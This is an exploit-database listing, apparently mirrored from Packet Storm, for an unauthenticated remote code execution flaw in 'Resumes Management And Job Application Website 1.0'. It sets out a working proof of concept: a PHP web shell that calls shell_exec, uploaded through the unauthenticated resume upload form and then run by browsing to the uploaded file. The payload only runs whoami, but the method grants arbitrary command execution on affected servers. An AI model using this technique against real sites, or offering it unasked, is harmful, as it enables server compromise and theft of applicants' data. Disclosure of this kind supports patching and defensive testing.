Exploit for Resumes Management And Job Application Website 1.0 Shell Upload

Name: Exploit for Resumes Management And Job Application Website 1.0 Shell Upload
Rating: 5 (132 reviews)

2021-01-04 | CVSS -0.3

## https://sploitus.com/exploit?id=PACKETSTORM:160751
# Exploit Title: Resumes-management-and-job-application-website  
unauthenticated RCE  
# Date: 3/1/2021  
# Exploit Author: Arnav Tripathy  
# Vendor Homepage: https://egavilanmedia.com  
# Software Link:  
https://egavilanmedia.com/resumes-management-and-job-application-website/  
# Version: 1.0  
# Tested on: linux/lamp  
  
Submit rce.php in resume file upload unauthenticated.Contents of rce.php  
<?php  
$output = shell_exec('whoami');  
echo "<h1>$output</h1>";  
?>  
  
Navigate to http://localhost/Resumes Management and Job Application  
Website/files/rce.php  
  
You will get the output of whoami